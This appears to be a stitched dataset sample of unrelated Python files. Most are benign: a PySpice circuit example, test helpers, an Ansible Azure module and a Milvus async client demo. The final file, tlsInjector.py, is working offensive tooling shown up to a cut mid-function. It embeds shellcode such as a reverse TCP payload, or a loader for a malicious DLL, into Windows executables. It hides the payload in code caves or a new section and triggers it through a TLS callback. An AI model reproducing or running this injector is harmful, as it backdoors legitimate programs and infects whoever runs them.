print 'Winner: {0}\tLoser: {1}'.format(playerPair[3], playerPair[1])
elif random.random() < .5:
# first player won
reportMatch(playerPair[0], playerPair[2])
print 'Winner: {0}\tLoser: {1}'.format(playerPair[1], playerPair[3])
else:
# second player won
reportMatch(playerPair[2], playerPair[0])
print 'Winner: {0}\tLoser: {1}'.format(playerPair[3], playerPair[1])
standings = playerStandings()
# create local variable for calculating rank
rank = 0
currentWins = -1
print "\nCurrent Tournament Standings\n"
print 'Rank\tName\tPoints'
for row in standings:
# check each players wins against wins from prior players.
# increment rank if necessary. Rank is just for tourney rank
if currentWins != row[2]:
rank = rank + 1
currentWins = row[2]
print '{0}\t{1}\t{2}'.format(rank, row[1], row[2])
print '\n-----------------------------\n'
#return results
| StarcoderdataPython |
1681481 | #r# ============================================
#r# Resistive voltage divider
#r# ============================================
#r# This example shows the simulation of a simple voltage divider made of resistances
######################################### IMPORT UTILITIES #########################################
import sys
# Insert at 1, 0 is the script path
# Inserting it at the beginning has the benefit of guaranteeing that the path is searched before others (even built-in ones) in the case of naming conflicts
sys.path.insert(1, '../utilities/')
from utilities import format_output
####################################################################################################
import PySpice.Logging.Logging as Logging
logger = Logging.setup_logging()
####################################################################################################
from PySpice.Spice.Netlist import Circuit
from PySpice.Unit import *
####################################################################################################
# CIRCUIT DEFINITION
####################################################################################################
circuit = Circuit('Voltage divider')
# Define the netlist
circuit.V('in', 'input', circuit.gnd, 10@u_V)
circuit.R(1, 'input', 'out', 8@u_kOhm)
circuit.R(2, 'out', circuit.gnd, 2@u_kOhm)
# Show the netlist
print('**** Circuit netlist: ****')
print(circuit)
####################################################################################################
# SIMULATION
####################################################################################################
# Set up the simulation
simulator = circuit.simulator(temperature=25, nominal_temperature=25)
# Run the simulation
analysis = simulator.operating_point()
# Show results
print('**** Simulation result: ****')
voltages, currents = format_output(analysis, 'operating_point')
out_value = voltages['out']
print(out_value, " [V]") | StarcoderdataPython |
4877663 | <reponame>ryanpdwyer/jittermodel<gh_stars>1-10
from jittermodel import u
import nose
import functools
from nose.tools import assert_almost_equal, assert_raises
import unittest
def pint_assert_almost_equal(first, second, unit=None, places=None,
msg=None, delta=None):
"""assert_almost_equal for pint quantities. Use unit to
specify the unit to make the comparison in.
The default behaviour converts the second quantity to the first unit."""
if unit is None:
second.ito(first.units)
else:
first.ito(unit)
second.ito(unit)
return assert_almost_equal(first.magnitude, second.magnitude,
places=places, msg=msg, delta=delta)
def expected_failure(test):
"""A wrapper so that tests which are expected to fail don't cause nose
to crash.
See http://stackoverflow.com/q/9613932/2823213."""
@functools.wraps(test)
def inner(*args, **kwargs):
try:
test(*args, **kwargs)
except Exception:
raise nose.SkipTest
else:
raise AssertionError('Failure expected')
return inner
| StarcoderdataPython |
3238553 | <gh_stars>1-10
#!/usr/bin/python
#
# Copyright (c) 2021 <NAME>(@techcon65)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: azure_rm_diskencryptionset
version_added: "1.9.0"
short_description: Create, delete and update Disk encryption set
description:
- Creates, deletes, and updates Disk encryption set.
options:
resource_group:
description:
- The name of resource group.
required: true
type: str
name:
description:
- The name of the disk encryption set.
required: true
type: str
location:
description:
- Location for Disk encryption set. Defaults to location of resource group if not specified.
type: str
source_vault:
description:
- The name of source key vault containing encryption key.
type: str
key_url:
description:
- The url pointing to the encryption key to be used for disk encryption set.
type: str
state:
description:
- Assert the state of the disk encryption set. Use C(present) to create or update and C(absent) to delete.
default: present
type: str
choices:
- absent
- present
extends_documentation_fragment:
- azure.azcollection.azure
- azure.azcollection.azure_tags
author:
- <NAME> (@techcon65)
'''
EXAMPLES = '''
- name: create disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
source_vault: myvault
key_url: https://myvault.vault.azure.net/keys/Key1/e65090b268ec4c3ba1a0f7a473005768
state: present
- name: Update disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
source_vault: myvault
key_url: https://myvault.vault.azure.net/keys/Key1/e65090b268ec4c3ba1a0f7a473005768
state: present
tags:
key1: "value1"
- name: Delete disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
state: absent
'''
RETURN = '''
state:
description:
- Current state of the Disk Encryption Set.
returned: always
type: complex
contains:
id:
description:
- The disk encryption set ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/
Microsoft.Compute/diskEncryptionSets/mydiskencryptionset"
name:
description:
- Disk encryption name.
returned: always
type: str
sample: 'mydiskencryptionset'
location:
description:
- The Azure Region where the resource lives.
returned: always
type: str
sample: eastus
tags:
description:
- Resource tags.
returned: always
type: list
sample: [{"key1": "value1"}]
active_key:
description:
- Reference to Key vault and key used for disk encryption set.
returned: always
type: dict
sample: {
"key_url": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER",
"source_vault": {
"id": "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/
Microsoft.KeyVault/vaults/myvault"
}
}
identity:
description:
- The managed identity for the disk encryption set.
returned: always
type: dict
sample: {
"principal_id": "d3abec0a-5818-4bbd-8300-8014198124ca",
"tenant_id": "7268bab5-aabd-44f9-915f-6bf864e879c6",
"type": "SystemAssigned"
}
provisioning_state:
description:
- The provisioning state of the resource.
returned: always
type: str
sample: Succeeded
type:
description:
- The type of the resource.
returned: always
type: str
sample: "Microsoft.Compute/diskEncryptionSets"
'''
from ansible.module_utils.basic import _load_params
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase, HAS_AZURE, \
format_resource_id, normalize_location_name
try:
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMDiskEncryptionSet(AzureRMModuleBase):
def __init__(self):
_load_params()
# define user inputs from playbook
self.module_arg_spec = dict(
resource_group=dict(type='str', required=True),
name=dict(type='str', required=True),
location=dict(type='str'),
source_vault=dict(type='str'),
key_url=dict(type='str', no_log=True),
state=dict(choices=['present', 'absent'], default='present', type='str')
)
required_if = [
('state', 'present', ['source_vault', 'key_url'])
]
self.results = dict(
changed=False,
state=dict()
)
self.resource_group = None
self.name = None
self.location = None
self.source_vault = None
self.key_url = None
self.state = None
self.tags = None
super(AzureRMDiskEncryptionSet, self).__init__(self.module_arg_spec,
required_if=required_if,
supports_check_mode=True)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()) + ['tags']:
setattr(self, key, kwargs[key])
changed = False
results = dict()
disk_encryption_set = None
# retrieve resource group to make sure it exists
resource_group = self.get_resource_group(self.resource_group)
if not self.location:
# Set default location
self.location = resource_group.location
self.location = normalize_location_name(self.location)
if self.source_vault:
source_vault = self.parse_resource_to_dict(self.source_vault)
self.source_vault = format_resource_id(val=source_vault['name'],
subscription_id=source_vault['subscription_id'],
namespace='Microsoft.KeyVault',
types='vaults',
resource_group=source_vault['resource_group'])
try:
self.log('Fetching Disk encryption set {0}'.format(self.name))
disk_encryption_set_old = self.compute_client.disk_encryption_sets.get(self.resource_group,
self.name)
# serialize object into a dictionary
results = self.diskencryptionset_to_dict(disk_encryption_set_old)
if self.state == 'present':
changed = False
update_tags, results['tags'] = self.update_tags(results['tags'])
if update_tags:
changed = True
self.tags = results['tags']
if self.source_vault != results['active_key']['source_vault']['id']:
changed = True
results['active_key']['source_vault']['id'] = self.source_vault
if self.key_url != results['active_key']['key_url']:
changed = True
results['active_key']['key_url'] = self.key_url
elif self.state == 'absent':
changed = True
except CloudError:
if self.state == 'present':
changed = True
else:
changed = False
self.results['changed'] = changed
self.results['state'] = results
if self.check_mode:
return self.results
if changed:
if self.state == 'present':
identity = self.compute_models.EncryptionSetIdentity(type="SystemAssigned")
# create or update disk encryption set
disk_encryption_set_new = \
self.compute_models.DiskEncryptionSet(location=self.location,
identity=identity)
if self.source_vault:
source_vault = self.compute_models.SourceVault(id=self.source_vault)
disk_encryption_set_new.active_key = \
self.compute_models.KeyVaultAndKeyReference(source_vault=source_vault,
key_url=self.key_url)
if self.tags:
disk_encryption_set_new.tags = self.tags
self.results['state'] = self.create_or_update_diskencryptionset(disk_encryption_set_new)
elif self.state == 'absent':
# delete disk encryption set
self.delete_diskencryptionset()
self.results['state'] = 'Deleted'
return self.results
def create_or_update_diskencryptionset(self, disk_encryption_set):
try:
# create the disk encryption set
response = \
self.compute_client.disk_encryption_sets.create_or_update(resource_group_name=self.resource_group,
disk_encryption_set_name=self.name,
disk_encryption_set=disk_encryption_set)
if isinstance(response, LROPoller):
response = self.get_poller_result(response)
except Exception as exc:
self.fail("Error creating or updating disk encryption set {0} - {1}".format(self.name, str(exc)))
return self.diskencryptionset_to_dict(response)
def delete_diskencryptionset(self):
try:
# delete the disk encryption set
response = self.compute_client.disk_encryption_sets.delete(resource_group_name=self.resource_group,
disk_encryption_set_name=self.name)
if isinstance(response, LROPoller):
response = self.get_poller_result(response)
except Exception as exc:
self.fail("Error deleting disk encryption set {0} - {1}".format(self.name, str(exc)))
return response
def diskencryptionset_to_dict(self, diskencryptionset):
result = diskencryptionset.as_dict()
result['tags'] = diskencryptionset.tags
return result
def main():
AzureRMDiskEncryptionSet()
if __name__ == '__main__':
main()
| StarcoderdataPython |
6477650 | # -*- coding: utf-8 -*-
"""
@date: 2020/5/23 上午10:16
@file: __init__.py.py
@author: zj
@description:
"""
from .convert_from_ints import ConvertFromInts
from .expand import Expand
from .normalize import Normalize
from .random_sample_crop import RandomSampleCrop
from .resize import Resize
from .random_mirror import RandomMirror
from .subtract_means import SubtractMeans
from .to_tensor import ToTensor
from .to_percent_coords import ToPercentCoords | StarcoderdataPython |
1866616 | """
This is an example to demonstrate how to invoke milvus client APIs asynchronously.
There are partial APIs allowed to be invoked asynchronously, they are: insert(), create_index(),
search(), flush() and compact().
This example is runnable for milvus(0.11.x) and pymilvus(0.4.x)(developing).
"""
import random
from pprint import pprint
from milvus import Milvus, DataType
# ------
# Setup:
# First of all, you need a runing Milvus(0.11.x). By default, Milvus runs on localhost in port 19530.
# Then, you can use pymilvus(0.4.x)(developing) to connect to the server, You can change the _HOST
# and _PORT accordingly.
# ------
_HOST = '127.0.0.1'
_PORT = '19530'
client = Milvus(_HOST, _PORT)
# ------
# Basic create collection:
# You already have a Milvus instance running, and pymilvus connecting to Milvus.
# The first thing we will do is to create a collection `demo_films`. In case we've already had a collection
# named `demo_films`, we drop it before we create.
# ------
collection_name = 'demo_films'
if collection_name in client.list_collections():
client.drop_collection(collection_name)
# ------
# Basic create collection:
# For a specific field, you can provide extra infos by a dictionary with `key = "params"`. If the field
# has a type of `FLOAT_VECTOR` and `BINARY_VECTOR`, "dim" must be provided in extra infos. Otherwise
# you can provide customed infos like `{"unit": "minutes"}` for you own need.
#
# In our case, the extra infos in "duration" field means the unit of "duration" field is "minutes".
# And `auto_id` in the parameter is set to `False` so that we can provide our own unique ids.
# For more information you can refer to the pymilvus
# documentation (https://milvus-io.github.io/milvus-sdk-python/pythondoc/v0.3.0/index.html).
# ------
collection_param = {
"fields": [
# Milvus doesn't support string type now, but we are considering supporting it soon.
# {"name": "title", "type": DataType.STRING},
{"name": "duration", "type": DataType.INT32, "params": {"unit": "minute"}},
{"name": "release_year", "type": DataType.INT32},
{"name": "embedding", "type": DataType.FLOAT_VECTOR, "params": {"dim": 8}},
],
"segment_row_limit": 4096,
"auto_id": False
}
# ------
# Basic create collection:
# After create collection `demo_films`, we create a partition tagged "American", it means the films we
# will be inserted are from American.
# ------
client.create_collection(collection_name, collection_param)
client.create_partition(collection_name, "American")
# ------
# Basic insert entities:
# We have two films groups of The_Lord_of_the_Rings series and Batman series here with their id, duration
# release_year and fake embeddings to be inserted. They are listed below to give you a overview of the structure.
# ------
The_Lord_of_the_Rings = [
{
# "title": "The_Fellowship_of_the_Ring",
"_id": 1,
"duration": 208,
"release_year": 2001,
"embedding": [random.random() for _ in range(8)]
},
{
# "title": "The_Two_Towers",
"_id": 2,
"duration": 226,
"release_year": 2002,
"embedding": [random.random() for _ in range(8)]
},
{
# "title": "The_Return_of_the_King",
"_id": 3,
"duration": 252,
"release_year": 2003,
"embedding": [random.random() for _ in range(8)]
}
]
Batmans = [
{
# "title": "Batman_Begins",
"_id": 4,
"duration": 140,
"release_year": 2005,
"embedding": [random.random() for _ in range(8)]
},
{
# "title": "Batman_The_Dark_Knight",
"_id": 5,
"duration": 152,
"release_year": 2008,
"embedding": [random.random() for _ in range(8)]
},
{
# "title": "Batman_The_Dark_Knight_Rises",
"_id": 6,
"duration": 165,
"release_year": 2012,
"embedding": [random.random() for _ in range(8)]
}
]
# ------
# Basic insert entities:
# We insert the `The_Lord_of_the_Rings` into our collection, into partition `American`, with ids we provide.
# Here, we pass parameter '_async=True' to insert data asynchronously, and return a `Future` object which
# has method `result()` to obtain result values and `done()` to wait util the invoked function(here is insert())
# exit.
# ------
print("\n----------insert rings films----------")
insert_future = client.insert(collection_name, The_Lord_of_the_Rings, partition_tag="American", _async=True)
insert_future.result()
# ------
# Basic insert entities:
# We insert the `Batmans` into our collection, into partition `American`, with ids we provide.
# Here, we pass parameter '_async=True' to insert data asynchronously, pass parameters '_callback=batman_insert_cb'
# to provide callback function which could be called if data was inserted successfully.
#
# The passing parameters of callback function are return values of insert().
# ------
def batman_insert_cb(inserted_ids):
print("Films about Batman are inserted and the ids are: {}".format(inserted_ids))
insert_future = client.insert(collection_name, Batmans, partition_tag="American",
_async=True, _callback=batman_insert_cb)
insert_future.done()
# ------
# Basic insert entities:
# After insert entities into collection, we need to flush collection to make sure its on disk,
# so that we are able to retrive it.
# ------
print("\n----------flush----------")
flush_future = client.flush([collection_name], _async=True)
flush_future.result()
# ------
# Basic hybrid search entities:
# Getting films by id is not enough, we are going to get films based on vector similarities.
# Let's say we have a film with its `embedding` and we want to find `top3` films that are most similar
# with it by L2 distance.
# Other than vector similarities, we also want to obtain films that:
# `released year` term in 2002 or 2003,
# `duration` larger than 250 minutes.
#
# Milvus provides Query DSL(Domain Specific Language) to support structured data filtering in queries.
# For now milvus suppots TermQuery and RangeQuery, they are structured as below.
# For more information about the meaning and other options about "must" and "bool",
# please refer to DSL chapter of our pymilvus documentation
# (https://milvus-io.github.io/milvus-sdk-python/pythondoc/v0.3.0/index.html).
# ------
query_embedding = [random.random() for _ in range(8)]
dsl = {
"bool": {
"must": [
{
"term": {"release_year": [2002, 2003]}
},
{
# "GT" for greater than
"range": {"duration": {"GT": 250}}
},
{
"vector": {
"embedding": {"topk": 1, "query": [query_embedding], "metric_type": "L2"}
}
}
]
}
}
# ------
# Basic hybrid search entities:
# And we want to get all the fields back in reasults, so fields = ["duration", "release_year", "embedding"].
# If searching successfully, results will be returned.
# `results` have `nq`(number of queries) seperate results, since we only query for 1 film, The length of
# `results` is 1.
# We ask for top 3 in-return, but our condition is too strict while the database is too small, so we can
# only get 1 film, which means length of `entities` in below is also 1.
#
# Now we've gotten the results, and known it's a 1 x 1 structure, how can we get ids, distances and fields?
# It's very simple, for every `topk_film`, it has three properties: `id, distance and entity`.
# All fields are stored in `entity`, so you can finally obtain these data as below:
# And the result should be film with id = 3.
#
# Here, we pass parameter '_async=True' to insert data asynchronously, and return a `Future` object.
# ------
print("\n----------search----------")
search_future = client.search(collection_name, dsl, _async=True)
search_results = search_future.result()
# ------
# Basic delete:
# Now let's see how to delete things in Milvus.
# You can simply delete entities by their ids.
#
# After deleted, we invoke compact collection in a asynchronous way.
# ------
print("\n----------delete id = 1, id = 2----------")
client.delete_entity_by_id(collection_name, ids=[1, 4])
client.flush() # flush is important
compact_future = client.compact(collection_name, _async=True)
compact_future.result()
# ------
# Basic delete:
# You can drop partitions we create, and drop the collection we create.
# ------
client.drop_partition(collection_name, partition_tag='American')
if collection_name in client.list_collections():
client.drop_collection(collection_name)
# ------
# Summary:
# Now we've went through all basic communications pymilvus can do with Milvus server, hope it's helpful!
# ------
| StarcoderdataPython |
9649184 | <filename>utils/tlsInjector.py<gh_stars>100-1000
#!/usr/bin/env python
import pefile, sys, getopt, os, re, random, string, struct
from colorama import Fore, Style
__author__ = "<NAME>"
__mail__ = "<EMAIL>"
__version__ = "1.0"
class colors:
GREEN = '\033[92m'
FAIL = '\033[91m'
BOLD = '\033[1m'
RESET = '\033[0;0m'
ORANGE = '\033[33m'
#Credits to nOps for the SectionDoubleP class: http://git.n0p.cc/?p=SectionDoubleP.git. This saved me a lot of work
class SectionDoublePError(Exception):
pass
class SectionDoubleP:
def __init__(self, pe):
self.pe = pe
def __adjust_optional_header(self):
""" Recalculates the SizeOfImage, SizeOfCode, SizeOfInitializedData and
SizeOfUninitializedData of the optional header.
"""
# SizeOfImage = ((VirtualAddress + VirtualSize) of the new last section)
self.pe.OPTIONAL_HEADER.SizeOfImage = (self.pe.sections[-1].VirtualAddress +
self.pe.sections[-1].Misc_VirtualSize)
self.pe.OPTIONAL_HEADER.SizeOfCode = 0
self.pe.OPTIONAL_HEADER.SizeOfInitializedData = 0
self.pe.OPTIONAL_HEADER.SizeOfUninitializedData = 0
# Recalculating the sizes by iterating over every section and checking if
# the appropriate characteristics are set.
for section in self.pe.sections:
if section.Characteristics & 0x00000020:
# Section contains code.
self.pe.OPTIONAL_HEADER.SizeOfCode += section.SizeOfRawData
if section.Characteristics & 0x00000040:
# Section contains initialized data.
self.pe.OPTIONAL_HEADER.SizeOfInitializedData += section.SizeOfRawData
if section.Characteristics & 0x00000080:
# Section contains uninitialized data.
self.pe.OPTIONAL_HEADER.SizeOfUninitializedData += section.SizeOfRawData
def __add_header_space(self):
""" To make space for a new section header a buffer filled with nulls is added at the
end of the headers. The buffer has the size of one file alignment.
The data between the last section header and the end of the headers is copied to
the new space (everything moved by the size of one file alignment). If any data
directory entry points to the moved data the pointer is adjusted.
"""
FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
SizeOfHeaders = self.pe.OPTIONAL_HEADER.SizeOfHeaders
data = '\x00' * FileAlignment
# Adding the null buffer.
self.pe.__data__ = (self.pe.__data__[:SizeOfHeaders] + data +
self.pe.__data__[SizeOfHeaders:])
section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
# Copying the data between the last section header and SizeOfHeaders to the newly allocated
# space.
new_section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
size = SizeOfHeaders - new_section_offset
data = self.pe.get_data(new_section_offset, size)
self.pe.set_bytes_at_offset(new_section_offset + FileAlignment, data)
# Filling the space, from which the data was copied from, with NULLs.
self.pe.set_bytes_at_offset(new_section_offset, '\x00' * FileAlignment)
data_directory_offset = section_table_offset - self.pe.OPTIONAL_HEADER.NumberOfRvaAndSizes * 0x8
# Checking data directories if anything points to the space between the last section header
# and the former SizeOfHeaders. If that's the case the pointer is increased by FileAlignment.
for data_offset in xrange(data_directory_offset, section_table_offset, 0x8):
data_rva = self.pe.get_dword_from_offset(data_offset)
if new_section_offset <= data_rva and data_rva < SizeOfHeaders:
self.pe.set_dword_at_offset(data_offset, data_rva + FileAlignment)
SizeOfHeaders_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
self.pe.FILE_HEADER.sizeof() + 0x3C)
# Adjusting the SizeOfHeaders value.
self.pe.set_dword_at_offset(SizeOfHeaders_offset, SizeOfHeaders + FileAlignment)
section_raw_address_offset = section_table_offset + 0x14
# The raw addresses of the sections are adjusted.
for section in self.pe.sections:
if section.PointerToRawData != 0:
self.pe.set_dword_at_offset(section_raw_address_offset, section.PointerToRawData+FileAlignment)
section_raw_address_offset += 0x28
# All changes in this method were made to the raw data (__data__). To make these changes
# accessbile in self.pe __data__ has to be parsed again. Since a new pefile is parsed during
# the init method, the easiest way is to replace self.pe with a new pefile based on __data__
# of the old self.pe.
self.pe = pefile.PE(data=self.pe.__data__)
def __is_null_data(self, data):
""" Checks if the given data contains just null bytes.
"""
for char in data:
if char != '\x00':
return False
return True
def push_back(self, Name, VirtualSize=0x00000000, VirtualAddress=0x00000000,
RawSize=0x00000000, RawAddress=0x00000000, RelocAddress=0x00000000,
Linenumbers=0x00000000, RelocationsNumber=0x0000, LinenumbersNumber=0x0000,
Characteristics=0xE00000E0, Data=""):
""" Adds the section, specified by the functions parameters, at the end of the section
table.
If the space to add an additional section header is insufficient, a buffer is inserted
after SizeOfHeaders. Data between the last section header and the end of SizeOfHeaders
is copied to +1 FileAlignment. Data directory entries pointing to this data are fixed.
A call with no parameters creates the same section header as LordPE does. But for the
binary to be executable without errors a VirtualSize > 0 has to be set.
If a RawSize > 0 is set or Data is given the data gets aligned to the FileAlignment and
is attached at the end of the file.
"""
if self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections):
FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
SectionAlignment = self.pe.OPTIONAL_HEADER.SectionAlignment
if len(Name) > 8:
raise SectionDoublePError("The name is too long for a section.")
if ( VirtualAddress < (self.pe.sections[-1].Misc_VirtualSize +
self.pe.sections[-1].VirtualAddress)
or VirtualAddress % SectionAlignment != 0):
if (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) != 0:
VirtualAddress = \
(self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize -
(self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) + SectionAlignment)
else:
VirtualAddress = \
(self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize)
if VirtualSize < len(Data):
VirtualSize = len(Data)
if (len(Data) % FileAlignment) != 0:
# Padding the data of the section.
Data += '\x00' * (FileAlignment - (len(Data) % FileAlignment))
if RawSize != len(Data):
if ( RawSize > len(Data)
and (RawSize % FileAlignment) == 0):
Data += '\x00' * (RawSize - (len(Data) % RawSize))
else:
RawSize = len(Data)
section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
# If the new section header exceeds the SizeOfHeaders there won't be enough space
# for an additional section header. Besides that it's checked if the 0x28 bytes
# (size of one section header) after the last current section header are filled
# with nulls/ are free to use.
if ( self.pe.OPTIONAL_HEADER.SizeOfHeaders <
section_table_offset + (self.pe.FILE_HEADER.NumberOfSections+1)*0x28
or not self.__is_null_data(self.pe.get_data(section_table_offset +
(self.pe.FILE_HEADER.NumberOfSections)*0x28, 0x28))):
# Checking if more space can be added.
if self.pe.OPTIONAL_HEADER.SizeOfHeaders < self.pe.sections[0].VirtualAddress:
self.__add_header_space()
else:
raise SectionDoublePError("No more space can be added for the section header.")
# The validity check of RawAddress is done after space for a new section header may
# have been added because if space had been added the PointerToRawData of the previous
# section would have changed.
if (RawAddress != (self.pe.sections[-1].PointerToRawData +
self.pe.sections[-1].SizeOfRawData)):
RawAddress = \
(self.pe.sections[-1].PointerToRawData + self.pe.sections[-1].SizeOfRawData)
# Appending the data of the new section to the file.
if len(Data) > 0:
self.pe.__data__ = (self.pe.__data__[:RawAddress] + Data + \
self.pe.__data__[RawAddress:])
section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
# Manually writing the data of the section header to the file.
self.pe.set_bytes_at_offset(section_offset, Name)
self.pe.set_dword_at_offset(section_offset+0x08, VirtualSize)
self.pe.set_dword_at_offset(section_offset+0x0C, VirtualAddress)
self.pe.set_dword_at_offset(section_offset+0x10, RawSize)
self.pe.set_dword_at_offset(section_offset+0x14, RawAddress)
self.pe.set_dword_at_offset(section_offset+0x18, RelocAddress)
self.pe.set_dword_at_offset(section_offset+0x1C, Linenumbers)
self.pe.set_word_at_offset(section_offset+0x20, RelocationsNumber)
self.pe.set_word_at_offset(section_offset+0x22, LinenumbersNumber)
self.pe.set_dword_at_offset(section_offset+0x24, Characteristics)
self.pe.FILE_HEADER.NumberOfSections +=1
# Parsing the section table of the file again to add the new section to the sections
# list of pefile.
self.pe.parse_sections(section_table_offset)
self.__adjust_optional_header()
else:
raise SectionDoublePError("The NumberOfSections specified in the file header and the " + \
"size of the sections list of pefile don't match.")
return self.pe
def banner():
print colors.FAIL + "\n __| | __| _ _| _) | "
print " | | \__ \ | \ | -_) _| _| _ \ _| "
print "_| ____| ____/ ___| _| _| | \___| \__| \__| \___/ _| "
print " __/ @BorjaMerino \n" + colors.RESET
def usage():
banner()
print colors.RESET + "Info:"
print colors.GREEN +" Inject a shellcode into a binary and run it through a TLS callback"
print colors.RESET + "\nUsage:"
print colors.GREEN +" -s <file> - Shellcode to be executed by the TLS callback"
print " -f <file> - Target binary "
print " -o <file> - Output file (default: tls_injected.exe) "
print " -t - Create a new section (no code caves search) "
print " -r - Set basereloc directory to 0x0"
print " -l <path dll> - Loadlibrary payload: the shellcode will load the DLL supplied"
print " -h - Help"
print colors.RESET +"\nExamples:"
print colors.GREEN + " python tlsInjector.py -s reverse_tcp.bin -f putty.exe -r"
print " python tlsInjector.py -f putty.exe -l evil.dll -t \n" + colors.RESET
def open_file(arg,mode):
try:
file = open(arg,mode).read()
except IOError as e:
print colors.FAIL + str(e) + colors.RESET
sys.exit(1)
return file
def info_section(section):
print colors.ORANGE + " Name: " + section.Name
print " RelativeVirtualAddress: " + str(hex(section.VirtualAddress))
print " SizeOfRawData: " + str(hex(section.SizeOfRawData))
print " PointerToRawData: " + str(hex(section.PointerToRawData))
print " VirtualSize: " + str(hex(section.Misc_VirtualSize)) + colors.RESET
# Organize sections: first list: executable sections, second: the others
def organize_sections(sections):
sections_exe = []
sections_data = []
for section in sections:
# 0x20000000 IMAGE_SCN_MEM_EXECUTE
# 0x40000000 IMAGE_SCN_MEM_READ
# 0x00000020 IMAGE_SCN_CNT_CODE
if all(section.Characteristics & n for n in [0x20000000, 0x40000000, 0x00000020]):
sections_exe.append(section)
else:
sections_data.append(section)
return [sections_exe,sections_data]
def create_section(pe,shellcode,flags):
sections = SectionDoubleP(pe)
sectionName = '.' + ''.join(random.choice(string.lowercase) for i in range(random.randint(1, 6)))
try:
pe = sections.push_back(Characteristics=flags, Data=shellcode, Name=sectionName)
print colors.GREEN + "[+] New section added" + colors.RESET
info_section(pe.sections[-1])
except SectionDoublePError as e:
print colors.FAIL + str(e)
sys.exit(1)
return
# Update the content of the TLS structure to point to the shellcode
def update_tls_structure(rva,pe):
# Set AddressOfIndex (It will point to the same structure, SizeOfZeroFill field)
pe.set_dword_at_rva(rva+8,pe.OPTIONAL_HEADER.ImageBase+rva+16)
# Set AddressOfCallBacks to point to the callbacks array
pe.set_dword_at_rva(rva+12,pe.OPTIONAL_HEADER.ImageBase+rva+24)
print colors.GREEN + "[+] AddressOfCallBacks pointing to the array of callback addresses (va: 0x%x)" % (pe.OPTIONAL_HEADER.ImageBase+rva+24) + colors.RESET
# Set first pointer of the callbacks array to point to the Shellcode
pe.set_dword_at_rva(rva+24,pe.OPTIONAL_HEADER.ImageBase+rva+32)
print colors.GREEN + "[+] First callback entry pointing to the shellcode (va: 0x%x)" % (pe.OPTIONAL_HEADER.ImageBase+rva+32) + colors.RESET
# Update the IMAGE_DIRECTORY_ENTRY_TLS.
pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress = rva
pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size = 0x18
print colors.GREEN + "[+] IMAGE_DIRECTORY_ENTRY_TLS updated" + colors.RESET
print colors.ORANGE + " VirtualAddress: 0x%x " % (pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress)
print colors.ORANGE + " Size: 0x%x " % (pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size)
def get_codecaves(section,binary,size):
codecaves = []
raw_offset = section.PointerToRawData
length = section.SizeOfRawData
data = binary[raw_offset:raw_offset + length]
offsets = [m.start() for m in re.finditer('\x00'*(size), data)]
if offsets:
print colors.ORANGE + " %d code caves found in %s" % (len(offsets),section.Name) + colors.RESET
codecaves.append(section)
codecaves.append(offsets)
return codecaves
def search_codecaves(sections_org,binary,size):
print colors.GREEN + "[+] Searching code caves (%d bytes) in executable sections..." % (size) + colors.RESET
for section in sections_org[0]:
codecaves = get_codecaves(section,binary,size)
if codecaves:
return codecaves
print colors.FAIL + "[-] Code caves not found in executable sections. Taking a look at others..." + colors.RESET
for section in sections_org[1]:
codecaves = get_codecaves(section,binary,size)
if codecaves:
return codecaves
print colors.FAIL + "[-] Code caves not found in any sections. Taking another approach..." + colors.RESET
# Inject the shellcode in the offset indicated
def inject_shellcode(binary, shellcode, offset_cave):
binary = binary[:offset_cave ] + shellcode + binary [offset_cave+len(shellcode):]
return binary
def section_manage(pe,shellcode):
create_section(pe,shellcode,0xE0000020)
update_tls_structure(pe.sections[-1].VirtualAddress,pe)
def inject_tls(binary,shellcode):
print colors.GREEN + "[+] Shellcode size: %s bytes" % len(shellcode) + colors.RESET
pe = pefile.PE(data=binary)
if not hasattr(pe, 'DIRECTORY_ENTRY_TLS'):
print colors.GREEN + "[+] TLS Directory not present" + colors.RESET
# Add the 32 bytes TLS structure to the shellcode
shellcode = str('\0'*32) + shellcode
if section:
section_manage(pe, shellcode)
else:
sections_org = organize_sections(pe.sections)
codecaves = search_codecaves(sections_org,binary,len(shellcode))
if codecaves:
# Get a random offset
offset = codecaves[1][random.randint(0,len(codecaves[1])-1)]
raw_offset = codecaves[0].PointerToRawData + offset
rva = offset + codecaves[0].VirtualAddress
print colors.GREEN + "[+] Random code cave chosen at raw offset: 0x%x (rva: 0x%x section: %s)" % (raw_offset,rva,codecaves[0].Name) + colors.RESET
